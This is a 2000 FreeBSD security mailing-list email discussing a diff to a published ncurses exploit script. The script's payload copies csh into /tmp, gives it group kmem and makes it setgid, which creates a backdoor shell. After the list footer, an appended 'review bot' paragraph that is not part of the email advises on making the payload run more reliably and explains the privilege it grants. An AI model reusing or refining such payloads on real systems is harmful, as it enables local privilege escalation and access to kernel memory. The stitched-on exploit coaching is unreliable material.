From owner-freebsd-security Tue Oct 10 17:58:02 2000
Delivered-To: freebsd-security@freebsd.org
Received: from toad.com (toad.com [140.174.2.1]) by hub.freebsd.org (Postfix) with ESMTP id 053BD37B66C for ; Tue, 10 Oct 2000 17:57:59 -0700 (PDT)
Received: from grok.example.net (unknown@cr479972-a.rct1.bc.wave.home.com [24.113.37.168]) by toad.com (8.7.5/8.7.3) with ESMTP id RAA11312; Tue, 10 Oct 2000 17:57:55 -0700 (PDT)
Received: by grok.example.net (Postfix, from userid 1000) id 9690F21316E; Tue, 10 Oct 2000 17:58:35 -0700 (PDT)
Date: Tue, 10 Oct 2000 17:58:35 -0700
From: Steve Reid
To: Mike Silbersack
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ncurses buffer overflows (fwd)
Message-ID: <20001010175835.E9112@grok>
References: <20001010165908.C9112@grok> <20001010175013.D9112@grok>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.4i
In-Reply-To: <20001010175013.D9112@grok>; from Steve Reid on Tue, Oct 10, 2000 at 05:50:13PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Oct 10, 2000 at 05:50:13PM -0700, Steve Reid wrote:
> --- exploit.csh.orig	Tue Oct 10 17:42:49 2000
> +++ exploit.csh	Tue Oct 10 17:46:53 2000
> @@ -11,7 +11,7 @@
>  #!/bin/csh
>  
>  cp /bin/csh /tmp
> -/usr/sbin/chown venglin.kmem /tmp/csh
> +chgrp kmem /tmp/csh
>  chmod 2755 /tmp/csh
>  __EOF__

BTW, the above is relative to the exploit Przemyslaw Frasunek posted to bugtraq. In the one he posted to freebsd-security, the line was:

/usr/sbin/chgrp kmem /tmp/csh

which also doesn't work, because chgrp is in /usr/bin, not /usr/sbin.

This just goes to show that just because an exploit script doesn't work for you, it doesn't mean that you are not vulnerable. Assume the worst!

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
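Review bot: the replacement line `+chgrp kmem /tmp/csh` in the single hunk drops the absolute path, so whether it runs at all now depends on the PATH of whatever process executes the generated script, which in an exploit is exactly the environment you do not control; since the surrounding discussion already establishes that chgrp lives in /usr/bin, write `/usr/bin/chgrp kmem /tmp/csh` to match the absolute-path style of the line it replaces. Dropping the hard-coded `venglin` owner from the old `chown venglin.kmem` is the right call, because the `cp /bin/csh /tmp` two lines above already leaves the copy owned by the invoking user, and only the group needs changing. Two things worth a comment in the script: `chgrp kmem` will only succeed if the process running it is itself in group kmem (or root), which is the whole point of the script being executed by the compromised process, and the following `chmod 2755` sets the setgid bit, so a successful run leaves a world-executable /tmp/csh that hands group kmem to any local user who runs it; anyone testing this on a shared machine should remove that file afterwards.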